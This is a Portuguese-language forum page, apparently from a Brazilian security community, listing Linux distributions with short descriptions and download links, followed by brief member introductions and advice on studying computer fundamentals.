------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Ubuntu Ubuntu é uma das distribuições mais populares da atualidade e isso se deve ao fato dela se preocupar muito com o usuário final (desktop). Originalmente baseada no Debian, diferencia-se além do foco no desktop, em sua forma de publicação de novas versões, que são lançadas semestralmente. Download: http://www.ubuntu.com/download/desktop ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Zenwalk Zenwalk (antigo MiniSlack) é uma distribuição para computadores antigos fundada por Jean-Philippe Guillemin. É baseada no Slackware, mas cada vez mais se vem distinguindo dele, mas mantendo a compatibilidade com o mesmo. O ZenWalk necessita de apenas 128 MB de memória RAM e de um processador Intel Pentium III. Pode também ser rodado diretamente do CD. É uma excelente opção para quem tem computadores ou notebooks antigos. Há quatro versões disponíveis: Standard, que é a versão "normal" para desktops e notebooks; Core, que é um ponto de partida para construir um sistema personalizado; Live, que pode ser rodada no CD e Server, que é optimizada para servidores. Download: http://www.zenwalk.org/ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Kurumin O Kurumin foi uma distribuição desenvolvida pela equipe do Guia do Hardware e colaboradores, com o objetivo de ser um sistema fácil de usar, voltado especialmente para iniciantes e ex-usuários do Windows. Originalmente o Kurumin foi desenvolvido com base no Knoppix, passando em seguida a utilizar também componentes do Kanotix e outros projetos, além de ser baseado nos pacotes do Debian. Todos os componentes e scripts usados são abertos, o que possibilitou também o surgimento de versões modificadas do sistema. Apesar de ter feito um grande sucesso e ter sido durante algum tempo uma das distribuições mais usadas no país, o projeto acabou falhando em atrair um grupo de desenvolvedores interessados em participar de forma ativa do desenvolvimento. Este e outros fatores (entre eles a justificada cobrança em torno de novos recursos e melhorias) acabaram fazendo com que o projeto fosse descontinuado em janeiro de 2008. O Kurumin 7.0r3, disponível em alguns dos mirrors, é uma versão com pequenas atualizações, sincronizada em relação aos repositórios do Debian Etch. Se você já está utilizando o Kurumin 7, pode atualizar o sistema via apt-get, sem necessidade de instalar a nova versão. Download: http://www.baixaki.com.br/site/dwnld61950.htm ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Salix Salix é uma distribuição baseada em Slackware que é simples, rápida e fácil de usar. Salix é compatível com Slackware, para que utilizadores de Slackware possam usufruir dos repositórios Salix. Como o bonsai, Salix é pequeno, leve e o produto de ínfimo cuidado. Download: http://www.salixos.org/download.html ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Satux Sistema operacional 100% brasileiro baseado em software livre - tem como objetivo trazer inovação, praticidade, segurança e diversão, tornando sua experiência no mundo digital inigualável. O Satux disponibiliza até quatro ambientes de trabalho para organizar melhor suas atividades, além de uma interface simples e intuitiva, sem perder a qualidade gráfica que conta com recursos 3D e aplicativos interativos. O mundo digital oferece inúmeras ferramentas que auxiliam suas tarefas diárias como consultar saldo bancário, realizar transações, compras on-line, troca de arquivos, entre outros. Para que você possa usufruir tudo isso é preciso ter segurança, e o Satux® oferece o suporte necessário para que suas tarefas sejam executadas de forma segura. Download: http://www.satux.org.br/ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Metamorphose O Metamorphose é um sistema operacional completo, voltado para usuários iniciantes ou avançados; Nele você encontra mais de 150 aplicativos, incluindo, jogos (emuladores, games 3D e educativos), editores (HTML, animação, vídeo e áudio) e ainda conta com uma grande gama de aplicativos voltados para areá de multimídia e escritório. Todos esses recursos podem ser usados rodando o sistema via LIVE-CD, sem alterar nada no seu sistema instalado no HD, ideal para iniciantes em Linux. Você também tem a opção de instala-lo no HD, com um assistente de instalação muito pratico e fácil. Download: http://metamorphoselinux.net/ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ BrazilFW O BrazilFW Firewall and Router é uma mini distribuição Linux que destina a ser um firewall e roteador. Ele é o sucessor do Coyote Linux, iniciado originalmente por Joshua Jackson, e descontinuado na versão 2.24, em Agosto de 2005. Adotado por Claudio e Marcelo - Brazil, eles continuaram o desenvolvimento sobre o nome de BrazilFW. Tanto o Coyote Linux 2.x quando o BFW 2.x tem como base o Kernel Linux 2.4x. A versão 3.x (em fase de desenvolvimento) do BFW utiliza o Kernel 2.6x. O usuário Erythros chegou a desenvolver uma versão 3.x, mas logo depois abandonou-a. Em Maio de 2008, o Woshman utilizando o projeto Linux From Scratch começa a escrever a versão 3.x do zero. O BFW 2.x é uma continuação do Coyote 2.x, mas já o BFW 3.x é uma mini distribuição linux totalmente nova. Ambas as versões do BrazilFW contam com uma gama de addons (utilitários diversos compilados e com interface projetada para rodar nesta distro) que podem ser instalados no BrazilFW para os mais variados propósitos. O BrazilFW conta com um portal e um fórum próprios, sendo o fórum divido em 3 línguas (Português BR, Espanhol e Inglês). Maiores informações em: http://www.brazilfw.com.br Download: http://www.brazilfw.com.br/downloads/distro/ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Chakra O Chakra foi criado no interior da Freenode, onde alguns desenvolvedores do KDEmod se reuniam para discussões sobre GNU/Linux. Em um desses encontros resolveram criar um pequeno LiveCD baseado no Arch e com o passar do tempo o Chakra tomou uma outra direção tornando uma distribuição fácil de instalar e usar. Seguindo a filosofia KISS, o Chakra é super flexível na sua usabilidade, que tenta manter as coisas o mais simples possível. É uma distribuição do sistema operacional GNU/Linux, desenvolvida para ser usada em desktops ou portáteis com arquitetura de 64bits (x86_64). O seu foco principal é no ambiente gráfico KDE e nos aplicativos desenvolvidos em Qt para manter seu sistema limpo de aplicações GTK. O Chakra é half-rolling, onde as releases se baseam no KDE, isto significa que a cada nova versão do KDE haverá um novo release da distribuição. Download: http://chakraos.org/home/?get ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Epidemic Linux Distro brasileiríssima, baseada no Debian Squeeze, excelente para novatos e "cascudos", vem sendo continuamente atualizada e já está na versão 3.2B1, lançada recentemente. Vocês podem observar a qualidade do Epidemic pelo primor de site, que segue anexo: http://www.epidemiclinux.org/ Download: http://www.epidemiclinux.org/download/ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Puppy Linux Puppy Linux é uma distribuição Live CD iniciada por by Barry Kauler. Puppy é muito pequeno, e desenvolvido para ser seguro, fácil de usar e completamente customizável. Todo o sistema operacional e todos os outros aplicativos rodam da memória RAM. Há algumas aplicações inclusas tais como SeaMonkey/Mozilla, AbiWord, Sodipodi, Gnumeric, e Gxine/Xine. Há ainda a possibilidade de ser adicionar aplicações, com a ferramenta Setup, adicionar e remover. A distribuição foi desenvolvida do zero, não é baseada em nenhuma outra distribuição. Download: http://www.puppylinux.com/download/index.html ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Damn Small Linux Sistema operacional livre, Damn Small é uma mini-distribuição. Designada para executar aplicativos gráficos em computadores antigos, esta distribuição é muito pequena, possuindo apenas 50 MB de arquivos de instalação. Damn Small Linux foi originalmente desenvolvido como um experimento para verificação de quantos sistemas funcionais preenchiam um live CD de somente 50 MB. Porém, com o tempo esta distribuição cresceu e se tornou um projeto concreto, com centenas de horas de desenvolvimento. Pequeno, porém completo! Com uma área de trabalho completa, esta distribuição possui aplicativos escolhidos com o melhor equilíbrio entre funcionalidade, tamanho e velocidade. Entre os principais aplicativos estão o tocador de músicas XMMS, o Firefox, o Xpdf, os editores Vim e Nano, o mensageiro Naim, o processador de texto Ted, clientes FTP e DHCP, entre outros. Download: http://www.baixaki.com.br/linux/download/damn-small-linux.htm ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ SliTaz O SliTaz é um sistema operacional livre, leve, rápido e estável que funciona completamente carregado na memória RAM e inicia a partir de mídias removíveis como um cdrom ou um pendrive. É distribuído na forma de LiveCD, o que significa que se pode obter uma imagem ISO a partir do site e gravá-la em um cdrom do qual você pode iniciar o sistema. Quando este estiver funcionando, pode-se ejetar o LiveCD e usar o drive de cd para outras tarefas. O Sistema Live fornece uma distribuição gráfica completamente funcional e permite a você manter seus dados e configurações pessoais em mídias graváveis. O sistema pode ser expandido com o gerenciador de pacotes Tazpkg e atualizações de segurança são fornecidas para as versões stable (estável) e cooking (testes). A imagem ISO padrão da distribuição fornece 4 variantes: base, just-x, gkt-only e desktop completo e também oferece a opção de boot via web. Assim, cobre várias necessidades específicas, suportando vários dispositivos, desde computadores antigos, servidores de alta disponibilidade e plataforma ARM com o Raspberry Pi. O SliTaz é simples de ser utilizado por usuários iniciantes em GNU/Linux: fornece uma área de trabalho moderna, que segue os padrões Freedesktop com ferramentas personalizadas que permitem ao usuário configurar todo o sistema por meio de caixas de diálogo gráficas. O sistema também permite seu gerenciamento remoto por meio de um painel de configuração via web. O sistema base traz um servidor X simples, sem outros programas, que permite a personalização do sistema somente com os elementos que o usuário deseja. Esse sistema pode, depois, ser utilizado a partir de um CDROM, pendrive, sdcard, instalado no disco rígido ou inicializado via web. A distribuição segue a filosofia UNIX: todos os elementos do sistema se encontram em arquivos texto. O gerenciador de pacotes e todas as configurações do sistema são arquivados em arquivos de texto simples, que podem ser lidos e modificados por qualquer pessoa. A maioria das ferramentas do sistema são feitas em SHell Script, o que permite sua customização por desenvolvedores que conheçam essa linguagem. O boot do sistema é feito por meio de 4 scripts, que configuram todo o processo, lidam com as opções de boot, gerenciam a rede e outros comandos locais. Somente o necessário para a distribuição funcionar é executado, dando espaço para o usuário controlar todo o resto conforme suas necessidades. O sistema é capaz de rodar completamente na memória RAM, à partir de um LiveCD, de um pendrive ou de uma instalação frugal no disco rígido. Isto permite salvar configurações e documentos em uma partição montada localmente enquanto o sistema é executado de forma rápida e responsiva. A rede em volta da distribuição é estruturada e integrada, o que permite uma fácil navegação por todos os sites. O desenvolvimento é centralizado em repositórios Mercurial e ferramentas customizadas tais como o sistema de informação de bugs e o cookutils. Algumas características do SliTaz: Sistema de Arquivos Root com cerca de 100 MB e a imagem ISO menor que 30 MB. Servidor Web pronto para uso fornecido pelo LightTPD com suporte a CGI e PHP. Navegue na Web com o Midori ou o Retawq em modo texto. Suporte a som fornecido pelo mixer Alsa, tocador de audio e extrator/codificador de CD. Clientes de chat, e-mail e FTP. Cliente/Servidor SSH fornecido pelo Dropbear. Banco de Dados com o SQLite. Geração de dispositivo LiveUSB. Ferramentas para criar, editar ou gravar imagens de CD ou DVD. Desktop elegante com o Openbox rodando sobre o Xorg (Servidor Gráfico). Caixas de Diálogo gráficas nativas para utilitários de linha-de-comando. Cerca de 3345 pacotes facilmente instaláveis a partir do mirror. Comunidade ativa e amigável. Download: http://www.slitaz.org/pt/get/ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Kali Linux Kali Linux é a nova geração da distribuição líder na indústria de testes des intrusão e auditoria de segurança, BackTrack. Kali Linux é uma reconstrução completa a partir do zero, aderindo completamente aos padrões de desenvolvimento Debian. Download: http://br.docs.kali.org/download-pt-br/faca-o-download-das-imagens-oficiais-do-kali ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Bodhi Linux Bodhi Linux é uma distribuição destinada para computadores com poucos recursos de hardware. O estilo do sistema Bodhi prevê poucos programas instalados, somente os extremamente necessários. Isto acaba exigindo poucos recursos computacionais e faz com que se torne realmente útil para PC's mais antigos. O mínimo exigido para rodar o Bodhi Linux é apenas: 300+MHz CPU, 128MB RAM e 2.5GB de disco! Baseada no Ubuntu Download: http://www.bodhilinux.com/download/ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ Funtoo Linux Funtoo é um Sistema Operacional livre, baseado em Linux, baseado no Gentoo e iniciado em torno de 2008 por Daniel Robbins, membro criador e líder de projeto do Gentoo. O Funtoo tem uma série de mudanças em pacotes considerados base, como por exemplo suporte nativo a UTF-8, e já habilitado por padrão. Funtoo utiliza o git para guardar a árvore do Portage. Este método é descrito como superior ao utilizado pelo Gentoo através do rsync. Metro é uma solução de empacotamento automatizada, para a criação dos stages usados durante a instalação do Funtoo. boot-update provê um mecanismo unificado de configuração dos bootloaders GRUB 1.9x(sys-boot/grub) e GRUB 0.97 (sys-boot/grub-legacy). O Funtoo adicionou uma solução simplificada de redes em suas fundações, permitindo usuários criar de forma fácil interfaces de rede complexas baseadas em perfis preestabelecidos. Download: http://www.funtoo.org/Subarches ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ DuZeru Uma distribuição brasileira. Boas ideias surgem de nossas próprias necessidades ou a partir de problemas que tentamos solucionar, assim surgiu o DuZeru, para solucionar de maneira fácil questões de sustentabilidade, adaptação e melhor desempenho em desktops e notebooks. Une o melhor entre sistemas operacionais e interfaces gráficas do mundo Linux, atendendo às necessidades do usuário casual, eventual, profissional ou estudante. A moeda de troca deste projeto voluntário é conhecimento mútuo, quando fazemos algo com amor e dedicação em primeiro lugar, fica bem feito. Download: http://duzeru.org/ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ FONTE: https://www.vivaolinux.com.br/download-linux/
  45. 1 point
    (Olá) humanos, Não sou muito boa em interação social mais aqui vai minha apresentação. Sou técnica em hardware e estou migrando para área de desenvolvimento e segurança de rede. Desde já agradeço pela oportunidade de estar aqui e fico a disposição para ajudar no que eu souber. Tô aqui para aprender e dizer que nunca vamos saber de tudo, e morreremos sem saber, então moçada estude, leia livros de conteúdo bom, e não seja idiota. Seja humilde quando precisar ser. Enfim. Sigo sobrevivendo nesse mundão esquisito. TMJ. vlw flw.
  46. 1 point
    Alguém interessado em formar um grupo de estudos sério para CTFs?
  47. 1 point
    Eae galera, eu sou o Mr Snow, é um grande prazer de vocês me conhecer, não tenho muita coisa pra falar, ex adm do fábrica de noobs. Estou aqui para aprender mais. É isto.
  48. 1 point
    Seja bem vindo parceiro!
  49. 1 point
    Sempre digo que um hacker de computadores tem que entender como um computador funciona. Para entender o funcionamento de um computador basicamente, estude Arquitetura e Organização de Computadores, para saber como funciona as unidades de controle, processamento, periféricos, etc... Depois, você precisa saber um pouco mais sobre o principal software que os computadores rodam, os Sistemas Operacionais, estude sobre isso também. Além disso, é importante também entender os protocolos de rede, que é como os computadores se comunicam um com os outros. Também estude isso. Isso é o essencial. Depois de aprender isso, você saberá quais os próximos passos que vc tem que dar. Não siga dicas como "aprenda kali linux" ou "aprenda a programar python". No máximo vc aprenderá a executar ferramentas prontas que não te levarão a nada.
  50. 1 point
    ola esse canal e seu ? muito bom o conteudo... podemos entrar em contato ?
This leaderboard is set to Sao Paulo/GMT-03:00
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.